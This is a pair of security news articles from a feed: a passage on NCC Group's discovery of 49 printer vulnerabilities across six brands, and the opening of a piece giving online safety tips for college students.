“Printers are commonly overlooked as devices that just ‘print’ and not as the network devices they are, which implement a lot of capabilities and store really sensitive information — not only documents, but also domain credentials and other secrets,” Romero and Rivas said in an e-mail interview. “For this reason, we think that they are very interesting targets for attackers using them as the front door to compromise an organization.”

Using some custom automated tools, the NCC Group research uncovered 49 vulnerabilities, as identified by their Common Vulnerability Enumeration (CVE) numbers. The researchers made extensive use of protocol fuzzing and plan to discuss one of their fuzzers at their DEF CON talk.

“We focused our research on [certain] attack surfaces, such as specific printer protocols, services, or implementations,” the researchers told Dark Reading. “This is the reason why the different types of printer vulnerabilities found were often common across different brands. As far as we were able to identify, there weren’t common components between the different brands.”

Brother printers had the fewest vulnerabilities, with three issues found, including two overflows and an information disclosure vulnerability. HP printers had five issues, including multiple buffer overflows, cross-site scripting, and a bypass for countermeasures implemented to prevent cross-site request forgery.

Xerox and Lexmark printers had eight and nine vulnerabilities, respectively, including multiple buffer overflows, cross-site scripting, and information disclosure. Both Ricoh and Kyocera printers had a dozen vulnerabilities each. All four of the most vulnerable printer brands lacked countermeasures to prevent cross-site request forgery.

The researchers noted that they only had time to determine the definite exploitability of a few of the issues.

NCC Group criticized the shortfalls in the security measures implemented by printer manufacturers’ software development teams.

“It’s very important that manufacturers continue to invest in security for all devices, just as corporate IT teams should guard against IoT-related vulnerabilities with even small changes: changing default settings, enforcing secure configuration guides, and regularly updating firmware,” Lewis said.

Businesses should pay more attention to their printers as potential points of attacks and as devices that could allow an attacker to stay resident inside a network, the NCC Group researchers said.


Article source: https://www.darkreading.com/vulnerabilities---threats/significant-vulnerabilities-found-in-6-common-printer-brands/d/d-id/1335485?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

7 Online Safety Tips for College Students

Heading back to campus soon? Here are seven tips that will get your digital house in order and keep you safe online this semester.

Image Source: Adobe Stock: Monkey Business


Parents naturally worry about their kids leaving for college – their physical safety high on the list. But in the digital world, college students are at risk, too, in the forms of identity theft and online fraud.

According to the FTC’s “Consumer Sentinel Network Data Book,” released in February, much of the crime revolves around fraudulent wire transfers or attacks on credit cards and gift cards. The FTC found reports of fraud around student loans increased by 119% in 2018. In addition, 43% of younger people ages 20 to 29 reported losing money to fraud compared with only 15% of those ages 70 to 79.

The good news: There are many practical steps students can take to protect themselves online.

It starts with some real-life common sense. “Students should physically lock down their laptops when they are not in their dorm rooms, and keep sensitive information, such as Social Security cards and birth certificates, locked in a safe,” says Paige Hanson, chief of identity education for Norton LifeLock.

Next on the online-safety list? Read on.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md.

Article source: https://www.darkreading.com/7-online-safety-tips-for-college-students/d/d-id/1335481?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple